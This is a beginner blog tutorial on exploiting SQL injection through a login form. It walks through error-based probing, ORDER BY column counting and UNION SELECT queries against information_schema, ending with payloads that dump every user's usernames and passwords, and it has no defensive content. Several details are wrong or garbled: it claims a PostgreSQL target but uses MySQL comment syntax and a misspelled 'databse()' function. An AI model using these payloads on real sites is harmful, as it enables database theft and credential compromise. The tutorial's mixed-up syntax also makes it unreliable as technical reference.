SQL injection, it is one of the most popular web attack and it is considered to be one of the most severe web attack because with SQL injection one can see the database of the website.
In this blog we will have a brief look how you can exploit SQL injection in the simplest way.
I am assuming that you are beginner to SQL injection so we will assume that the website is not using any kind of firewall and is not blocking any kind of characters for the sake of simplicity.
But, in real life you will encounter such website where filtering would be made and they would be blocking all of bad characters you are entering.
How It Works ?
Suppose their is a login portal who ask for your username and password and if you entered correct your information is shown.Likewise their would be information of many people stored in the database.
Suppose, you entered
Username = admin
Password = 1234
Now request would be sent to database server like
select * from <table> where user=‘admin’ and pass=‘1234’;
And if the aboove query would be correct then the data of requested user would be shown.
We Will Simply Abuse This To Take data from database.
- Generate Error
- Fix Error
- Find number of cloumns
- Find database name
- Find Table Name
- Find Column Name
- Extract data
I am Assuming That My Target Databse is PostgreSQL
- Now let’s suppose that insted of entering username you entered a quotation mark(').
Now query would be select * from <table> where user=''' and pass=‘1234’;
Now you would see their are 3 quotation mark and this would violate the syntax of the query and if no WAF is used an error messege would be generated and seen on the web application .
Now we have to fix the query so that we can enter query to view inside database.
Now suppose on username field you entered admin’ %23 this would comment the whole query after the %23 sign as it is the sign for comment and after executing it you will see nothing on webpage nor the error.
The sign for comment varies from database to databese. Some of them are #,%23,– -, – .
Now our username field is like
admin’ <space> %23
In the space we have to enter our query. To see the number of columns we use order by command .
#Now all the commands I will type is to be placed in the blank space.
order by 10 = if the websites will have 10 column or more than that then no error would be shown and if less than that then error would be shown. So we have to change the number till we find correct number of column.
Suppose I see error on order by 5 and error is not shown in order by 4 then their are 4 column in database.
Final Query: admin’ order by 4 %23
- Now we will use union select to see which number reflect and then we will enter our query their.
union select 1,2,3,4 = I have discovered 4 column in my database so I have placed counting till 4 in union select.
Now we would observe that which number reflect on web page.
Suppose 2 reflected so we can enter the query to see database name , version .
union select 1,databse(),3,4 = show database name
union select 1,version(),3,4 = show database version
- Now it is time to find the table name in the database . The query is table_name.
The default database is information_schema so we will query the table name from the database.
admin’ union select 1,table_name ,3,4 from information_schema.tables %23
#Suppose I find tables user_data, info, other_info
This will show us all the table name in the database.
Now we will find the column in the table of our choice.
admin’ union select 1,column_name ,3,4 from information_schema.columns where table_name = “user_data” %23
This will give us all the column in the table user_data . Now suppose I got the column username and password
Now this is the final step of the SQL injection and now we will extract the data.
admin’ union select 1,username,3,4 from user_data %23
Now this will dump the username of all the registered users on the website
admin’ union select 1,password,3,4 from user_data %23
Now this will dump the password of all the registered users on the website
Congratulations !! We have successfully attacked the web application and forced it to dump it’s database.
Different web application are coded in different way so the way of exploiting them will be different.
Also SQL injection is a very vast topic and it is impossible to cover all its detail in one article. This article just gives you overview how you can exploit SQL Injection.
- Dipanshu Pandey